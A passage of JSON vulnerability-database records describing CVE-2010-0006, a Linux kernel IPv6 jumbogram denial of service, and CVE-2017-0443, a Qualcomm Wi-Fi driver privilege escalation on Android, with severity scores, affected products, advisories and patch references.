          "@vocab": "https://www.variotdbs.pl/ref/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "MEDIUM",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.1,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 8.6,
            "id": "CVE-2010-0006",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.8,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2010-0006",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201001-263",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-0006"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The ipv6_hop_jumbo function in net/ipv6/exthdrs.c in the Linux kernel before 2.6.32.4, when network namespaces are enabled, allows remote attackers to cause a denial of service (NULL pointer dereference) via an invalid IPv6 jumbogram, a related issue to CVE-2007-4567. Linux The kernel IPv6 jumbogram There is a vulnerability in the processing of. \nAttackers can exploit this issue to cause a kernel panic, denying service to legitimate users. ----------------------------------------------------------------------\n\n\n\nSecunia integrated with Microsoft WSUS \nhttp://secunia.com/blog/71/\n\n\n\n----------------------------------------------------------------------\n\nTITLE:\nFedora update for kernel\n\nSECUNIA ADVISORY ID:\nSA38168\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/38168/\n\nDESCRIPTION:\nFedora has issued an update for the kernel. This fixes a\nvulnerability, which can be exploited by malicious people to cause a\nDoS (Denial of Service). \n\nSuccessful exploitation requires that network namespaces are enabled. \n\nSOLUTION:\nApply updated packages via the yum utility (\"yum update kernel\"). \n\nORIGINAL ADVISORY:\nFEDORA-2010-0823:\nhttps://admin.fedoraproject.org/updates/F12/FEDORA-2010-0823\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-0006"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      },
      {
        "db": "BID",
        "id": "37810"
      },
      {
        "db": "PACKETSTORM",
        "id": "85473"
      }
    ],
    "trust": 1.98
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "37810",
        "trust": 2.7
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0006",
        "trust": 2.7
      },
      {
        "db": "OSVDB",
        "id": "61876",
        "trust": 2.4
      },
      {
        "db": "SECUNIA",
        "id": "38168",
        "trust": 1.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2010/01/14/2",
        "trust": 1.6
      },
      {
        "db": "SECUNIA",
        "id": "38333",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001087",
        "trust": 0.8
      },
      {
        "db": "FEDORA",
        "id": "FEDORA-2010-0919",
        "trust": 0.6
      },
      {
        "db": "NSFOCUS",
        "id": "14412",
        "trust": 0.6
      },
      {
        "db": "MLIST",
        "id": "[LINUX-NETDEV] 20100114 [PATCH]: IPV6: SKB_DST() CAN BE NULL IN IPV6_HOP_JUMBO().",
        "trust": 0.6
      },
      {
        "db": "MLIST",
        "id": "[OSS-SECURITY] 20100114 CVE-2010-0006 - KERNEL: IPV6: SKB_DST() CAN BE NULL IN IPV6_HOP_JUMBO()",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-263",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "85473",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-0006"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      },
      {
        "db": "BID",
        "id": "37810"
      },
      {
        "db": "PACKETSTORM",
        "id": "85473"
      }
    ]
  },
  "id": "VAR-201001-0163",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.3857143
  },
  "last_update_date": "2021-12-18T21:59:59.281000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ChangeLog-2.6.32.4",
        "trust": 0.8,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.32.4"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-476",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-20",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-0006"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/37810"
      },
      {
        "trust": 2.4,
        "url": "http://www.osvdb.org/61876"
      },
      {
        "trust": 1.9,
        "url": "http://marc.info/?l=linux-netdev\u0026m=126343325807340\u0026w=2"
      },
      {
        "trust": 1.6,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-january/034250.html"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/38333"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2010/01/14/2"
      },
      {
        "trust": 1.6,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=2570a4f5428bcdb1077622342181755741e7fa60"
      },
      {
        "trust": 1.6,
        "url": "http://www.kernel.org/pub/linux/kernel/v2.6/changelog-2.6.32.4"
      },
      {
        "trust": 1.6,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=555217"
      },
      {
        "trust": 1.6,
        "url": "http://secunia.com/advisories/38168"
      },
      {
        "trust": 1.6,
        "url": "http://bugs.gentoo.org/show_bug.cgi?id=300951"
      },
      {
        "trust": 1.6,
        "url": "http://security-tracker.debian.org/tracker/cve-2010-0006"
      },
      {
        "trust": 1.6,
        "url": "http://cert.fi/en/reports/2010/vulnerability341748.html"
      },
      {
        "trust": 1.0,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2010-02/msg00002.html"
      },
      {
        "trust": 0.8,
        "url": "http://www.cert.fi/en/reports/2010/vulnerability341748.html"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-0006"
      },
      {
        "trust": 0.8,
        "url": "http://jvn.jp/cert/jvnvu571860/"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2010-0006"
      },
      {
        "trust": 0.6,
        "url": "http://www.nsfocus.net/vulndb/14412"
      },
      {
        "trust": 0.3,
        "url": "http://www.kernel.org/"
      },
      {
        "trust": 0.3,
        "url": "http://support.avaya.com/css/p8/documents/100141285"
      },
      {
        "trust": 0.3,
        "url": "http://www.ubuntu.com/usn/usn-894-1"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/blog/71/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "https://admin.fedoraproject.org/updates/f12/fedora-2010-0823"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/38168/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2010-0006"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      },
      {
        "db": "BID",
        "id": "37810"
      },
      {
        "db": "PACKETSTORM",
        "id": "85473"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2010-0006"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      },
      {
        "db": "BID",
        "id": "37810"
      },
      {
        "db": "PACKETSTORM",
        "id": "85473"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2010-01-26T18:30:00",
        "db": "NVD",
        "id": "CVE-2010-0006"
      },
      {
        "date": "2010-01-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      },
      {
        "date": "2010-02-26T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      },
      {
        "date": "2010-01-14T00:00:00",
        "db": "BID",
        "id": "37810"
      },
      {
        "date": "2010-01-21T10:22:03",
        "db": "PACKETSTORM",
        "id": "85473"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-11-13T16:41:00",
        "db": "NVD",
        "id": "CVE-2010-0006"
      },
      {
        "date": "2010-01-27T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      },
      {
        "date": "2014-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-001087"
      },
      {
        "date": "2015-05-07T17:09:00",
        "db": "BID",
        "id": "37810"
      },
      {
        "date": null,
        "db": "PACKETSTORM",
        "id": "85473"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel \u0027ipv6_hop_jumbo()\u0027 Remote denial of service vulnerability",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      },
      {
        "db": "BID",
        "id": "37810"
      }
    ],
    "trust": 0.9
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "input validation",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201001-263"
      }
    ],
    "trust": 0.6
  }
}

var-201702-0758
Vulnerability from variot

An elevation of privilege vulnerability in the Qualcomm Wi-Fi driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-32877494. References: QC-CR#1092497. GoogleNexus/Pixel is a Google smartphone from the United States. Google Nexus/ Pixel products are prone to multiple privilege-escalation vulnerabilities. These issues are being tracked by Android Bug IDs A-32402310, A-32402604, A-32450647, A-32454494, A-32451171, A-32451104, A-33252788, A-32872662, A-32871330, A-32877494 and A-32879283

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201702-0758",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 2.4,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "linux",
        "version": "3.18"
      },
      {
        "model": "android",
        "scope": null,
        "trust": 1.4,
        "vendor": "google",
        "version": null
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "google",
        "version": "7.1.1"
      },
      {
        "model": "nexus",
        "scope": "eq",
        "trust": 0.9,
        "vendor": "google",
        "version": "5x"
      },
      {
        "model": "pixel",
        "scope": null,
        "trust": 0.6,
        "vendor": "google",
        "version": null
      },
      {
        "model": "pixel xl",
        "scope": null,
        "trust": 0.6,
        "vendor": "google",
        "version": null
      },
      {
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "pixel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01583"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001492"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0443"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-291"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:google:android:7.1.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.10:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:linux:linux_kernel:3.18:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0443"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Hao Chen and Guang Gong of Alpha Team, Qihoo 360 Technology Co. Ltd",
    "sources": [
      {
        "db": "BID",
        "id": "96047"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2017-0443",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": true,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "High",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.6,
            "confidentialityImpact": "Complete",
            "exploitabilityScore": null,
            "id": "CVE-2017-0443",
            "impactScore": null,
            "integrityImpact": "Complete",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.9,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "HIGH",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.6,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 4.9,
            "id": "CNVD-2017-01583",
            "impactScore": 10.0,
            "integrityImpact": "COMPLETE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.0,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.0,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "High",
            "attackVector": "Local",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.0,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2017-0443",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "Required",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2017-0443",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2017-01583",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201702-291",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2017-0443",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01583"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0443"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001492"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0443"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-291"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An elevation of privilege vulnerability in the Qualcomm Wi-Fi driver could enable a local malicious application to execute arbitrary code within the context of the kernel. This issue is rated as High because it first requires compromising a privileged process. Product: Android. Versions: Kernel-3.10, Kernel-3.18. Android ID: A-32877494. References: QC-CR#1092497. GoogleNexus/Pixel is a Google smartphone from the United States. Google Nexus/ Pixel products are prone to multiple privilege-escalation vulnerabilities. \nThese issues are being tracked by Android Bug IDs A-32402310, A-32402604, A-32450647, A-32454494, A-32451171, A-32451104, A-33252788, A-32872662, A-32871330, A-32877494 and A-32879283",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-0443"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001492"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01583"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0443"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-0443",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "96047",
        "trust": 2.6
      },
      {
        "db": "SECTRACK",
        "id": "1037798",
        "trust": 1.7
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001492",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2017-01583",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-291",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0443",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01583"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0443"
      },
      {
        "db": "BID",
        "id": "96047"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001492"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0443"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-291"
      }
    ]
  },
  "id": "VAR-201702-0758",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01583"
      }
    ],
    "trust": 0.06
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01583"
      }
    ]
  },
  "last_update_date": "2023-12-18T11:21:05.982000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Android Security Bulletin-February 2017",
        "trust": 0.8,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org/"
      },
      {
        "title": "Patch for QualcommWi-FiDriver Privilege Escalation Vulnerability (CNVD-2017-01583) for GoogleNexus/Pixel Products",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/89414"
      },
      {
        "title": "Android Qualcomm Wi-Fi Fixes for driver permission and access control vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=67575"
      },
      {
        "title": "Android Security Bulletins: Android Security Bulletin\u2014February 2017",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=android_security_bulletins\u0026qid=861656f01e3e18209f39ad844e9ee35d"
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2017-01583"
      },
      {
        "db": "VULMON",
        "id": "CVE-2017-0443"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001492"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201702-291"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-noinfo",
        "trust": 1.0
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2017-001492"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-0443"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.securityfocus.com/bid/96047"
      },
      {
        "trust": 2.1,
        "url": "https://source.android.com/security/bulletin/2017-02-01.html"
      },
      {
        "trust": 1.7,
        "url": "https://www.codeaurora.org/out-bounds-write-wlan-driver-function-wlanhddcfg80211setextroamparams-cve-2017-0443"
      },
      {
        "trust": 1.7,
        "url": "http://www.securitytracker.com/id/1037798"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-0443"
      },
      {
